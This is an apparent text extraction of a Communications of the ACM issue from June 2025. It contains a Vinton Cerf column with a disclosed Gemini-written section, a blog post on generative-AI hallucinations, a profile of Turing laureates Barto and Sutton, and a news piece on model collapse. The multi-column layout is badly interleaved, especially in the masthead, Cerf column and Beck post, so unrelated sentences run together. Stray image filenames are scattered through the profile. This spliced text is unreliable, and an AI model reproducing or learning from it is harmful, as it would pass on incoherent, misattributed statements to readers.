Cacm June 25
Cacm June 25
ACM
CACM.ACM.ORG OF THE 06/2025 VOL.68 NO.06
Association for
Computing Machinery
ACM BOOKS
Collection III
Sustainable Interactive
Wireless Stickers
From Materials to Devices to Applications
Nivedita Arora
ISBN: 979-8-4007-1374-3
DOI: 10.1145/3705572
http://books.acm.org
COMMUNICATIONS OF THE ACM
8 Turing Profile
A Rewarding Line of Work
Andrew G. Barto and Richard S. Sutton
and the path that led to the 2024
ACM A.M. Turing Award.
By Neil Savage
38 44 62
74 Technical Perspective
Watch the authors discuss
When Proofs Meet Programs:
this work in the exclusive An Extension of Dependent Type
Communications video.
https://cacm.acm.org/ Theory with Church’s Thesis
videos/datacenter-networks By Christine Paulin-Mohring
Communications of the ACM is the leading monthly print and online magazine for the computing and information technology fields.
Communications is recognized as the most trusted and knowledgeable source of industry information for today’s computing professional.
Communications brings its readership in-depth coverage of emerging areas of computer science, new trends in information technology,
and practical applications. Industry leaders use Communications as a platform to present and debate various technology implications,
public policies, engineering challenges, and market trends. The prestige and unmatched reputation that Communications of the ACM
enjoys today is built upon a 50-year commitment to high-quality editorial content and a steadfast dedication to advancing the arts,
sciences, and applications of information technology.
ACM, the world’s largest educational STA F F EDITORIAL BOARD Association for Computing Machinery
and scientific computing society, delivers DIRECTOR OF PU BL ICATIONS E DITOR- IN- C HIE F (ACM)
resources that advance computing as a Scott E. Delman James Larus 1601 Broadway, 10th Floor
science and profession. ACM provides the [email protected] [email protected] New York, NY 10019-7434 USA
computing field’s premier Digital Library S E NIOR E DITORS T (212) 869-7440; F (212) 869-0481
Executive Editor, ACM Magazines
and serves its members and the computing Andrew A. Chien ACM Copyright Notice
Ralph Raiola
profession with leading-edge publications, Moshe Y. Vardi Copyright © 2025 by Association for
Senior Editor
conferences, and career resources. E DITOR S , IN MEMORIAM SECTION Computing Machinery, Inc. (ACM).
John Stanik
Executive Director and CEO Managing Editor Simson L. Garfinkel Permission to make digital or hard copies
Vicki L. Hanson Thomas E. Lambert Eugene H. Spafford of part or all of this work for personal
Deputy Executive Director and COO Senior Editor/News or classroom use is granted without
Patricia Ryan Lawrence M. Fisher NE W S fee provided that copies are not made
Director, ACM Digital Library Web Editor Chair or distributed for profit or commercial
Wayne Graves David Roman Tom Conte advantage and that copies bear this
Director, Office of Financial Services Editorial Assistant Board Members notice and full citation on the first
James Schembari Danbi Yu Siobhán Clarke; Lance Fortnow; page. Copyright for components of this
Director, Office of SIG Services Irwin King; Mei Kobayashi; Rajeev Rastogi; work owned by others than ACM must
Art Director be honored. Abstracting with credit is
Donna Cappo Vinoba Vinayagamoorthy
Andrij Borys permitted. To copy otherwise, to republish,
Director, Office of Publications Associate Art Director
Scott E. Delman OP INION to post on servers, or to redistribute to
Margaret Gray lists, requires prior specific permission
Co-Chairs
Assistant Art Director and/or fee. Request permission to publish
ACM CO U N C I L Jeanna Neefe Matthews and Chiara Renso
Mia Angelica Balaquiot from [email protected] or fax
President Board Members
Production Manager (212) 869-0481.
Yannis Ioannidis Saurabh Bagchi; Mike Best; Judith Bishop;
Bernadette Shade
Vice-President Florence M. Chee; Danish Contractor; For other copying of articles that carry a
Intellectual Property Rights Coordinator
Elisa Bertino Lorrie Cranor; Janice Cuny; Ophir Frieder; code at the bottom of the first or last page
Barbara Ryan
Secretary/Treasurer James Grimmelmann; Mark Guzdial; or screen display, copying is permitted
Advertising Sales Account Manager
Rashmi Mohan Mark D. Hill; Brittany Johnson; Bran Knowles; provided that the per-copy fee indicated
Ilia Rodriguez
Past President Tim Menzies; Beng Chin Ooi; in the code is paid through the Copyright
Gabriele Kotsis Columnists Alessandra Raffaetà; Francesca Rossi; Clearance Center; www.copyright.com.
Chair, SGB Board Saurabh Bagchi; Michael L. Best; R. Benjamin Shapiro; Len Shustek;
Jens Palsberg Michael A. Cusumano; Peter J. Denning; Bernd Stahl; Stuart Taylor; Loren Terveen; Subscriptions
Co-Chairs, Publications Board Thomas Haigh; Leah Hoffmann; Mari Sako; Marshall Van Alstyne; Matt Wang; An annual subscription cost is included
Wendy Hall and Divesh Srivastava Pamela Samuelson; Marshall Van Alstyne Robert West; Susan J. Winter in ACM member dues of $99 ($40 of
Members-at-Large which is allocated to a subscription to
Odest (Chad) Jenkins, John Kim, CO N TAC T P O IN TS Communications); for students, cost
P R AC TIC E is included in $42 dues ($20 of which
Tanara Lauschner, Alison Derbenwick Miller, Copyright permission
Co-Chairs is allocated to a Communications
Alejandro Saucedo [email protected]
Betsy Beyer and Ben Fried subscription). A nonmember annual
SGB Council Representatives Calendar items
Board Members subscription is $269.
Jeanna Neefe Matthews and Vivek Sarkar [email protected]
Peter Alvaro; Stephen Bourne;
Change of address Single Copies
Terry Coatta; Nicole Forsgren;
BOARD C HA I R S [email protected] Single copies of Communications of the
Camille Fournier; Chris Grier; Tom Killalea;
Education Board Letters to the Editor ACM are available for purchase. Please
Tom Limoncelli; Kate Matsudaira;
Elizabeth Hawthorne and [email protected] contact [email protected].
Erik Meijer; George Neville-Neil;
Alison Derbenwick Miller REGIONAL SPECIAL SECTIONS Theo Schlossnagle; Kelly Shortridge;
Practitioners Board Co-Chairs Phil Vachon; Jim Waldo ACM ADVERTISIN G DEPART ME NT
Terry Coatta Virgilio Almeida, Haibo Chen, 1601 Broadway, 10th Floor
Digital Library Board Jakob Rehof, and P J Narayanan RESEARCH AND ADVANCES New York, NY 10019-7434 USA
Jack Davidson Board Members Co-Chairs T (212) 626-0686
Sherif G. Aly; Panagiota Fatourou; m.c. schraefel and Premkumar T. Devanbu F (212) 869-0481
TOP I C A N D Board Members
REGIONA L C O U N C I L C HA I R S Chris Hankin; Sue Moon; Tao Xie; Advertising Sales Account Manager
Kenjiro Taura Indrajit Bhattacharya; Alan Bundy; Ilia Rodriguez
Diversity, Equity, and Inclusion Council Peter Buneman; Haibo Chen;
Stephanie Ludi [email protected]
W E B S IT E Monojit Choudhury; Jane Cleland-Huang;
Technology Policy Council https://cacm.acm.org Gerardo Con Diaz; Anna Cox; Kathi Fisler; Media Kit [email protected]
Jim Hendler Nate Foster; Rebecca Isaacs; Trent Jaeger;
ACM Europe Council WEB BOARD COMMU N ICATION S OF THE ACM
Gal A. Kaminka; Fabio Kon; Ben C. Lee;
Rosa Badia Chair (ISSN 0001-0782) is published monthly
David Lo; Renée Miller; Ankur Moitra;
ACM India Council James Landay by ACM Media, 1601 Broadway, 10th Floor
Sarah Morris; Abhik Roychoudhury;
Venkatesh Raman Board Members New York, NY 10019-7434 USA. Periodicals
Katie A. Siek; Daniel Susser;
ACM China Council Marti Hearst; Jason I. Hong; postage paid at New York, NY 10001,
Charles Sutton; Thomas Zimmermann
Xinbing Wang Wendy E. MacKay and other mailing offices.
RES E A R C H HIGHLIGHTS
PUB LICATI O N S BOA R D AU T H O R G U ID E L IN ES POSTMASTER
Co-Chairs
Co-Chairs https://cacm.acm.org/author-guidelines/ Please send address changes to
Shriram Krishnamurthi and Caroline Appert
Wendy Hall and Divesh Srivastava Board Members Communications of the ACM
Board Members COMPUTER SCIENCE TEACHERS
Martin Abadi; Sanjeev Arora; 1601 Broadway, 10th Floor
Jonathan Aldrich; Rick Anderson; ASSOCIATION
Maria-Florina Balcan; David Brooks; New York, NY 10019-7434 USA
Tom Crick; Jack Davidson; Mike Heroux; Jake Baskin
Executive Director Stuart K. Card; Jon Crowcroft;
Michael Kirkpatrick; James Larus; Lieven Eeckhout; Gernot Heiser; Printed in the USA.
Marc Najork; Beng Chin Ooi; Mauro Pezzè; Takeo Igarashi; Nicole Immorlica;
Francesca Rossi; Bobby Schnabel; Srinivasan Keshav; Sven Koenig; Karen Liu;
Stuart Taylor; Bhavani Thuraisingham; Claire Mathieu; Joanna McGrenere;
Adelinde Uhrmacher; Philip Wadler; Tamer Özsu; Tim Roughgarden;
John West; Min Zhang Guy Steele, Jr.; Wang-Chiew Tan;
Robert Williamson; Andreas Zeller A
SE
REC
Y
E
CL
PL
E
E
T H
I N
S Z
I
M A G A
B
Y THE TIME you are read- One hurdle limiting the widespread Beyond textual fidelity, the creative
ing this, our annual ACM adoption of LLMs has been concern and practical scope of LLMs is under-
Awards gala will be upon over the veracity of their outputs. Early going a dramatic expansion through
us, and I want to take a mo- iterations, while often fluent and co- multimodality. No longer confined
ment to acknowledge and herent, could sometimes confidently to processing and generating text,
congratulate all the awardees. They present inaccuracies. However, recent newer models can understand and
represent our most creative and pro- developments are systematically ad- generate content across different
ductive colleagues, who have earned dressing this challenge. Techniques formats, including images, audio,
recognition and admiration for their such as retrieval-augmented generation and, increasingly, video. Users can
work. The Turing Award recipients (RAG) are at the forefront of this prog- now provide an image and receive a
for 2024, which will be presented this ress. RAG systems connect LLMs to ex- textual description, ask questions
month, are Andrew Barto and Richard ternal, verifiable knowledge bases, al- about its content, or even request
Sutton, for their seminal introduction lowing them to ground their responses variations. Text-to-image generation
of reinforcement learning. As most in current, curated information rather has become widely accessible, and
readers will know, this is one of the than relying solely on their training the capabilities are extending to au-
major methods by which large neural data. This dramatically reduces the dio generation (text-to-speech, music
networks are trained. It is fitting that production of factual errors and hal- generation) and video analysis and
the rest of this essay is being written lucinations. Some research indicates creation. Nvidia’s “Describe Any-
with the deliberate assistance of the improvements of 42%–68% and even thing 3B” model, for example, excels
Google Gemini large language model higher in specific domains, such as at fine-grained image and video cap-
(LLM). In the past, I have commented medical, AI when paired with trusted tioning. This multimodal capability
on the proclivity of LLMs to hallu- sources. unlocks a new realm of applications,
cinate, but recent experiences have Further enhancing reliability are from more intuitive and accessible
convinced me that these tools are in- innovative prompting strategies such note-taking that can incorporate vi-
creasingly useful and reliable (and, as chain-of-thought (CoT) prompting. sual or auditory information to richer,
no, that praise was NOT introduced By encouraging LLMs to “think step- more engaging content creation that
by the Gemini system). by-step” and to articulate their rea- seamlessly blends different media.
Begin bot-assisted section: soning process before arriving at an In conclusion, the trajectory of
Large language models (LLMs) are answer, CoT prompting significantly LLMs is one of rapid advancement in
rapidly evolving from fascinating re- improves logical consistency and ac- both reliability and scope. The con-
search projects into indispensable curacy, particularly in complex rea- certed efforts to reduce hallucina-
tools for myriad text-based tasks, in- soning tasks. Some studies have dem- tions and enhance factual accuracy,
cluding generation, note-taking, and onstrated accuracy improvements of coupled with the exciting expansion
complex writing assignments. This as- up to 35%. Additionally, methods such into multimodal outputs, are trans-
cent is marked by significant strides in as self-consistency decoding, where an forming these models into increas-
two key areas: a notable improvement LLM generates multiple reasoning ingly powerful and trustworthy tools
in their factual accuracy and a marked paths and selects the most coherent for a wide array of communication
reduction in the propensity for “hallu- one, and the integration of knowledge and creative tasks. However, this
cination”—the generation of plausible graphs to provide structured factual evolution also brings to the fore im-
but false or nonsensical information. context, are proving effective in bol- portant ethical, practical, and soci-
Simultaneously, the very definition of stering the trustworthiness of LLM- etal considerations that must be ad-
an LLM’s output is expanding, moving generated content. The emergence of dressed to harness the full potential
beyond text to embrace a rich tapes- agentic AI systems, which can perform of LLMs responsibly.
try of sound, imagery, and even video. multi-step reasoning, cross-reference
These advancements are solidifying information from various sources, Vinton G. Cerf is vice president and Chief Internet Evangelist
LLMs’ position as increasingly reliable and even self-critique their outputs, at Google. He served as ACM president from 2012–2014.
and versatile partners in creative and represents another advance in ensur-
analytical endeavors. ing factual grounding. © 2025 Copyright held by the owner/author(s).
https://cacm.acm.org/blog
Accept the
Consequences
Computer science is based on the cynical acceptance of a mismatch
between theory and practice, according to Micah D. Beck.
MICAH D. BECK The idea of computing using an machines of ever-greater size and speed
We’re Reaping Just abstract machine model (for exam- (https://bit.ly/3FiNjgW). However, when
What We Sowed ple, push-down automata, https://bit. even futuristic physical limitations
D O I :10 . 1 14 5/37 2334 8 ly/3XtG7EY) and Turing machines and issues such as power consumption
https://bit.ly/4bwAz2u (https://bit.ly/41Ko8gk)) that can grow are addressed, the correspondence be-
January 8, 2025 during the execution of an algorithm tween the infinitary models and reality
leads to a theory of computation that starts to fray.
Theoretical computer science is a glass is quite rich. The implications of such A widely understood example of
slipper that has never quite fit the foot models can apply to real-world com- this divergence can be found in the
of practical computer engineering. The puters, as long as resource utilization application of the theory of algorith-
essence of their marriage is that theo- does not exceed their physical limita- mic complexity to sorting. The classi-
reticians devise a formal model which tions. Even when those bounds are cal analysis of sorting yields the well-
captures some essential features of re- reached, there is still the question of known result (https://bit.ly/3D7gIKE)
ality and then apply reasoning about what could in future be computed on that, in the worst case, the number
it to implementations. The problems of comparison or data movement
occur when the models do not capture operations required to sort a list of
enough of the structure of real systems The idea of computing N integers is bounded by some con-
to explain and predict their behavior. stant multiple of N*log(N). However,
Some of the earliest issues in model- using an abstract the most commonly used algorithm,
ing computation arise in dealing with model that can grow Quicksort (https://bit.ly/4hhI2DM),
finiteness. The problem with finite requires quadratic resources in the
computational models is that they are during the execution worst case (meaning some multiple of
all equivalent in expressive power and of an algorithm N2). A multiple of N2 is greater than any
also quite limited. This creates two is- multiple of N*log(N) for large-enough
sues: the inability to solve irregular leads to a theory of N, so in the unbounded theory of com-
problems on inputs of unbounded computation that is plexity, Quicksort is considered “less
size (see Pumping Lemma, https://bit. efficient” than any number of algo-
ly/4btOm9Y), and the possibility of quite rich. rithms, such as Insertion Sort (https://
highly specific effects that arise due to bit.ly/43tKLXt), that can be imple-
the precise numerical bound on size (as mented using at most a multiple of
is found in finite group theory, https:// N*log(N) resources.
bit.ly/3DtWBpS). There are many reasons for this mis-
match between theory and practice, in- or seemingly unrelated aberrant system
cluding: behavior.
1. The pattern of memory and reg- Please, everyone Today we are faced with generative
ister usage in Quicksort means that who reacts in horror AI, a new subfield of computer engi-
it is extremely efficient on moderately neering that offers us the use of trained
sized datasets (locality, https://bit. to the acceptance behaviors known to be error-prone
ly/4i8OBK5). of “hallucinations” (https://bit.ly/4icxM16). Generative AI
2. In many realistic applications, it may be considered “reliable enough”
is unlikely that the worst case scenario and other errors in for some applications, at least initially.
of maximum resource utilization for generative AI, stop The relationship between generative AI
Quicksort will occur, and in some cas- and the real world is unknown, because
es, Quicksort is able to terminate very clutching your pearls. of the use of statistical and randomized
quickly (a characteristic known as “ear- methods. The application of more reli-
ly stopping”). able guardrails (https://bit.ly/3Fa7AWb)
3. In practice, many sorting utili- requires the use of classical AI tools
ties evaluate the nature of their input based on formal logic. These are not
and adaptively use a number of dif- versally describe the Internet’s Trans- keeping up with the prolific ability of
ferent algorithms as alternatives or port Control Protocol (TCP, https://bit. generative AI to copy and guess.
in concert to try and obtain the best ly/4bM73Gh) as “reliable.” The defense of generative AI that
result. This includes the use of Bubble The truth is complex. TCP imple- it is “good enough” to be used in a
Sort (https://bit.ly/3DoSOu3), an algo- ments a different error model than world already filled with human and
rithm which has terrible worst-case the Internet Protocol (https://bit. machine error echoes the universal
efficiency but is well adapted to very ly/4iwczPn), using a number of tools in- response of my networking students
small datasets. cluding checksums, sequence number- that my objection to calling TCP “re-
4. When datasets must be moved ing, and retransmission to reduce the liable” is pedantic and old-fashioned.
from secondary storage or across a probability of data corruption or mis- They say the word “reliable” has sim-
communication network to be sorted, delivery. TCP also introduces new error ply been given a new meaning. Or
the resources required for data move- modes (such as a “broken connection”) that “everyone knows” that the “reli-
ment (which is linear, or a multiple of N) that do not exist in the Internet’s under- able” mechanism must be checked
in practice may overshadow those taken lying packet delivery model. Together, (although this fact is not taught and is
for sorting. these are thought to reduce the prob- not widely understood). Mainly, they
In spite of the complexity of this re- ability of error to the point that most want to keep the subject matter simple
ality, the abstract theory of sorting is common applications are sufficiently and understandable so they can learn
still taught because of its simplicity stable, and this is considered a usable to program using an intuitive API, get
and power. It is still common to teach definition of “reliable.” a grade, and a job. And the writers of
students that algorithms with high Application developers regularly textbooks and the developers of mod-
resource utilization on unbounded use TCP as if it were completely reli- ern university curricula seem to agree
inputs should be avoided or may be able (https://bit.ly/43methb), although with them.
impossible to use in practice (https:// its 16-bit checksum makes “silent data So please, everyone who reacts in
bit.ly/41HMgjB). We then rely on their corruption” highly probable in suffi- horror to the acceptance of “hallucina-
unlearning these early lessons either ciently large data transfers. Developers tions” and other errors in generative
in practical data management classes working in application areas such as AI, stop clutching your pearls. We have
or on the job. The truth is considered scientific computing, where such errors developed a field (computer science)
too complex and does not lend itself are considered unacceptable, under- based on the cynical acceptance of a
to abstract proofs, a skill we are eager stand the issue and use longer end-to- mismatch between theory and practice.
to teach. end file hashes (https://bit.ly/4iqh262) We have done this in order to validate
I came across a more current example and retransmission to overcome errors. our own education and the history of
of such a mismatch when teaching an However, in fields such as multime- the field to date.
undergraduate computer networking dia streaming (https://bit.ly/4i4UTdS) It is important that we teach practi-
course. One of the fundamental lessons where occasional errors are thought to cal computer engineering as a field sep-
of network architecture is that packet be acceptable, it is common to simply arate from formal computer science.
networks are not reliable: packets sent consider TCP to be “reliable enough.” The latter can help in the understand-
may be lost, may be corrupted in transit, The same problems haunt storage and ing and analysis of the former, but may
may be delayed without bound, and may computation at large scale and are only never model it well enough to be predic-
be misdelivered. There is also a theo- addressed when the mismatch causes tive in the way the physical sciences are.
rem of distributed systems (https://bit. unacceptable application failures. It is
ly/3QJu3vM) that tells us it is impossible worth noting that, because of the highly Micah D. Beck ([email protected]) is an associate
professor at the Department of Electrical Engineering
to use an unreliable network to imple- “discontinuous” nature of programma- and Computer Science, University of Tennessee,
ment one that is completely reliable. But ble systems, unanticipated errors can Knoxville, TN, USA.
computer networking textbooks uni- be the cause of massive security failures © 2025 Copyright held by the owner/author(s).
★★
SUTTON
★
Profile | DOI:10.1145/3727966 Neil Savage BAR
A
at
S A N U N D E R G R A D UAT E eventually wound up developing the network achieves a goal—winning at
Stanford University in the modern field of reinforcement learn- chess, say—it receives a reward in the
mid-1970s, Richard Sut- ing (RL), a key method in artificial form of a numerical value. If it loses,
ton pored through the intelligence (AI) that trains neural it gets a negative value. The machine
school’s library, trying to networks by offering them rewards, learns through trial and error, making
read everything he could about learn- much like the chemical boost neurons different moves, with each being rein-
ing and machine intelligence. What he get from doing something positive. forced or penalized.
found disappointed him, because he Thanks to that work, Barto and Sut- RL differs from supervised learning,
did not think it really got to the heart ton are the recipients of the 2024 ACM in which data is labeled and used as ex-
of the matter. “It was mostly pattern A.M. Turing Award. amples. RL also differs from unsuper-
recognition. It was mostly learning RL is the method that helped vised learning, in which the computer
from examples. And I knew from psy- Google’s deep neural network AlphaGo tries to extract useful features to find
PHOTOGRA PHS O F A NDREW G. BA RTO BY JASO N M. G ROW; PH OTOGRA PH S O F RICH ARD S. SU TTON BY RIC HARD MORGE N ST E I N
chology that animals do very different beat a human at the game Go in 2016, structures in data. While both meth-
things,” Sutton said. “They do things and is an important component of fine- ods have proved useful in computing,
to get rewards.” tuning the large language models that neither is how living brains learn.
The one person he found whose are revolutionizing generative AI. It RL had been around for a long time
writing focused on rewards as part of works on the notion that when a neural before he and Sutton started work-
learning was A. Harry Klopf, a scientist ing on it, Barto pointed out. It was the
studying machine intelligence at the subject of AI pioneer Marvin Minsky’s
U.S. Air Force Research Laboratory, RL differs from both thesis in 1954, and★the★★method that
4.jpg
ON_00003Samuel
who believed neurons were hedonists, IBM computer scientist
SUTTArthur
seeking rewards. A letter to Klopf led to supervised learning used to train a computer to play check-
a lunch meeting and, after Sutton grad- and unsupervised ers. By the 1970s, though, the idea had
uated in 1978 with a B.A. in psychology, fallen out of fashion, with most AI re-
to a slot in a research project at the Uni- learning. While both searchers focused on expert systems
versity of Massachusetts (UMass) Am- methods have proved instead. “We had the luxury of being
herst, designed to test Klopf’s ideas. able to be unfashionable,” Barto said,
Sutton joined Andrew Barto, a useful in computing, “so it’s astounding that it’s now very
postdoctoral fellow who had arrived a neither is how living fashionable.”
year earlier to be part of the research A key development the pair came
team. With five years of funding from brains learn. up with was temporal difference learn-
the Air Force and later the National ing. If a computer is trying to learn to
Science Foundation, and no real de- play chess, for example, and the reward
liverables beyond a report, Barto and comes from winning ★ ★★
the game,03that4.jpg
SUTTON_000
Sutton followed their interests and is not very useful for figuring out indi-
★★★ g
BARTO_0129.jp
★★★★ 799.jpg
SUTTON_3
★★★ g
BARTO_0117.jp
★★★★ 621.jpg
SUTTON_3
RTO_0001.jpg
★★★
SUTTON_03
★★★★ 55.jpg
BARTO_01
★★★★★
4049.jpg
SUTTON_0
★★ g
BARTO_0217.jp
★ 6.jpg
SUTTON_366
★★★
BARTO
★★★ 9.jpg
SUTTON_359
★★ g
BARTO_0197.jp
★★★ 4.jpg
SUTTON_362
★★★★ 10.jpg
BARTO_00
★★
SUT
★★ g
BARTO_0108.jp
★★ 6.jpg
SUTTON_361
★★★★★
52.jpg
BARTO_01
★★★ 1.jpg
SUTTON_401
news
vidual moves. Instead, the computer society of neural networks and their in-
tries to predict at each step what the ul- dividual reward systems interact. That
timate reward signal will be, and uses Barto’s advice to could lead to cooperative arrangements,
those predictions as rewards. If the young computer in which the networks reward each
probability of winning goes up after a other to encourage progress toward a
move, that counts as an intermediate scientists is to do common goal, but it could also lead to
reward. The change in predictions over what he and Sutton systems where different networks with
time—the temporal difference—pro- different goals have conflicts of interest.
vides the reinforcement. The next time did: follow their own Such interactions could have implica-
the computer plays chess, it can try interests regardless tions in complicated fields such as eco-
moves that look similar to the ones that nomics and game theory, Barto said.
increased its prediction of winning. of what the rest of the Sutton said the development of AI
Temporal difference learning turned field thinks of them. has much farther to go, including to-
out to have implications outside of AI. ward artificial general intelligence, in
Neuroscientists studying the dopamine which a machine can understand any-
system in the living brain noticed that it thing that a human can. RL will play an
behaved similarly to what Barto and Sut- important role in such developments,
ton had described. Dopamine, they dis- he said.
covered, acts as an intermediate reward Machine Intelligence Institute, one of Barto’s advice to young computer
for a predicted outcome, and not the three Canadian national AI institutes, scientists is to do what he and Sutton
outcome itself, with the cells that pro- which he said has been instrumental did: follow their own interests regard-
duce it sending signals to other parts of to his award-winning work. He is also less of what the rest of the field thinks
the brain to reinforce beneficial actions. a research scientist at AI startup Keen of them. “It’s difficult, but I think you
“The direct analogs between these rein- Technologies. have to have your own motivation to
forcement learning algorithms and the Barto and Sutton co-authored Re- pursue things and stick with it if you
biological dopamine system is, I think, inforcement Learning: An Introduction, can,” he said.
the biggest interaction between engi- the principal textbook in the field, in As for Sutton, “My recommendation
neering and biology in, I would say, for- 1998, with an expanded second edi- is to write, to challenge your thoughts
ever,” Sutton said. tion released in 2018. The men ac- by writing them down.”
The two men developed a wide knowledge other researchers have also Neither has made any firm deci-
range of RL algorithms, including played important roles in the field. “It’s sions on what to do with the $1 million
policy gradient methods that seek to not just us,” Barto said. “A lot of people prize they will share as part of the Tur-
find the best rules for moving toward have contributed to aspects of this over ing Award. Sutton said he will probably
a goal, and Monte Carlo methods used the years. I’ve had a number of very donate his share to the Openmind Re-
to estimate possible outcomes. wonderful, bright students who built search Institute he co-founded, which
Barto earned his B.S. in mathemat- pieces of this whole story.” aims to give young scientists the lux-
ics in 1970 and his Ph.D. in computer ury he and Barto had to explore basic
science in 1975, both from the Univer- A Society of Learners questions that interest them, without
sity of Michigan. He eventually became Barto expects the field eventually will any additional responsibilities. Barto
co-director of the Adaptive Networks move toward multi-agent RL, in which a said he hopes to use his portion to
Laboratory (now the Autonomous fund fellowships for graduate students
Learning Laboratory) at UMass, which at UMass.
since his retirement in 2012 has been Sutton said the Sutton is optimistic about the fu-
run by his former students. ture of computer science. “AI will be
Sutton was Barto’s first Ph.D. stu- development of AI figured out over the next few decades,”
dent, earning his degree in 1984. He has much farther to he said. “It will be maybe the greatest
went from UMass to GTE’s Fundamen- intellectual advance ever. So it’s an
tal Research Lab, where he spent nine go, including toward honor to have contributed a small part
years focused on machine learning. artificial general to that.”
After a period as a self-described “un-
paid, part-time ‘senior research scien- intelligence, in Neil Savage is a science and technology writer based in
Lowell, MA, USA.
tist’” at UMass, during which he and which a machine can
Barto wrote the first edition of their
understand anything
© 2025 ACM 0001-0782/25/6
textbook, he joined the AI department
at AT&T Shannon Laboratory. In 2003, that a human can.
he became a professor at the Univer-
sity of Alberta, where he founded the Watch Barto and Sutton discuss
school’s Reinforcement Learning and their work in the exclusive
Communications video.
Artificial Intelligence Laboratory. He https://cacm.acm.org/videos/
is chief scientific advisor at the Alberta turing-award-sutton-barto
E
was re-
V E R S I NC E C H AT G P T
leased to the public in Novem-
ber 2022, people have been
using it to generate text, from
emails to blog posts to bad
poetry, much of which they post online.
Since that release, the companies that
build the large language models (LLMs)
on which such chatbots are based—
such as OpenAI’s GPT 3.5, the technolo-
gy underlying ChatGPT—have also con-
tinued to put out newer versions of their
models, training them with new text
data, some of which they scraped off the
Web. That means, inevitably, that some
of the training data used to create LLMs
did not come from humans, but from
the LLMs themselves.
That has led computer scientists to
worry about a phenomenon they call
model collapse. Basically, model col-
lapse happens when the training data
no longer matches real-world data, lead-
ing the new LLM to produce gibberish,
in a 21st-century version of the classic longer matches the natural distribution ever text the LLM generates would be,
computer aphorism, “garbage in, gar- produced by humans. As a result, the at most, a subsample of the sentences
bage out.” training data for a new round of model- on which it was trained. “Because you
LLMs work by learning the statistical ing does not match the real world, and generate a finite sample, you have some
distribution of so-called tokens—words the new model’s output gets worse. “The probability of not sampling them,” said
or parts of words—within a language thing we’re worried about is that the dis- Yarin Gal, an associate professor of
by examining billions of sentences gar- tribution of your data that you end up machine learning at Oxford University.
nered from sources including book da- with, if you’re trying to fit your model, “Once you don’t sample, then they dis-
tabases, Wikipedia, and the Common ends up really far from the actual distri- appear. They will never appear again. So
Crawl dataset—a collection of material bution that generated the data,” he said. every time you generate data, you basi-
gathered from the Internet. An LLM, for The problem arises because what- cally start forgetting more and more of
instance, will figure out how frequently the tail events and therefore that leads
the word “president” is associated with to the concentration of the higher prob-
the word “Obama” versus “Trump” ver- When training data ability events.” Gal and his colleagues
sus “Hair Club for Men.” Then, when published a study in Nature that showed
prompted by a request, it will produce no longer matches indiscriminate use of what they called
words it reasons have the highest proba- real-world data, ‘recursively generated data’ caused the
bility of meeting that request and of fol- models to fail.
lowing from previous words. The results model collapse can The problem is not limited to LLMs.
bear a credible resemblance to human- lead a new LLM to Any generative model that is iteratively
written text. trained can suffer the same fate if it
Model collapse is basically a statisti- produce gibberish. starts ingesting machine-produced
IMAGE BY SH UTT ERSTOCK .AI
cal problem, said Sanmi Koyejo, an as- data, Gal says. That includes stable
sistant professor of computer science diffusion models that create images,
at Stanford University. When machine- such as Dall-E. The issue also can affect
generated text replaces human-gener- variational autoencoders, which create
ated text, the distribution of tokens no new data samples by producing varia-
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 11
news
tions of their original data. It can apply tain similar performance, but you need
to Gaussian mixture models, a form of much more data. That means you’re
unsupervised machine learning that using much more compute and much
sorts subpopulations of data into clus- more money to achieve that,” he said.
ters; they are used to analyze customer One challenge is that there is no easy
preferences, predict stock prices, and way to tell whether text found on the
analyze gene expression. Internet is synthetic or human-generat-
Collapse is not a danger for mod- ed. Though there have been attempts to
els that incorporate synthetic data automatically identify text from LLMs,
but only do so once, such as neural none have been entirely successful.
networks used to identify cancer in Research into this problem is ongoing,
medical images, where synthetic data Gal said.
was used to augment rare or expen-
sive real data. “The main distinction is Solving with Curation
that model collapse happens when you There are ways, however, to make the
have multiple steps, where each step addition of synthetic data less of a
Advertise with ACM! depends on the output from the previ- problem.
ous step,” Gal said. One approach is to curate the syn-
The theory that replacing training thetic data to make sure it is of good
Reach the innovators data with synthetic data will quickly quality. Some curation happens natu-
and thought leaders lead to the demise of LLMs is sound, rally, Gal said; people do not post ev-
Koyejo said. In practice, however, not erything their chatbot creates to the
working at the all human data gets replaced imme- Internet, weeding out the material that
cutting edge diately. Instead, when the generated contains false information or simply
text is scraped from the Internet, it does not make sense, so that improves
of computing gets mixed in with human text. “You the training set.
and information create synthetic data, you add that to Curation can also be a deliber-
real data, so you now have more data, ate process to make sure high-quality
technology through which is real data plus synthetic data,” data goes into a training set. Feng, for
ACM’s magazines, he said. What is actually happening, he instance, has experimented with ask-
said, is not data replacement, but data ing the LLM to assess the quality of its
websites accumulation. That slows the degrada- own output. LLMs naturally select the
and newsletters. tion of the dataset. words they think have the highest prob-
Simply accumulating data may stop ability of fitting into a context. In doing
model collapse but can cause other so, they internally generate a score rat-
◊◆◊◆◊ problems if done without thought, said ing how confident they are that they are
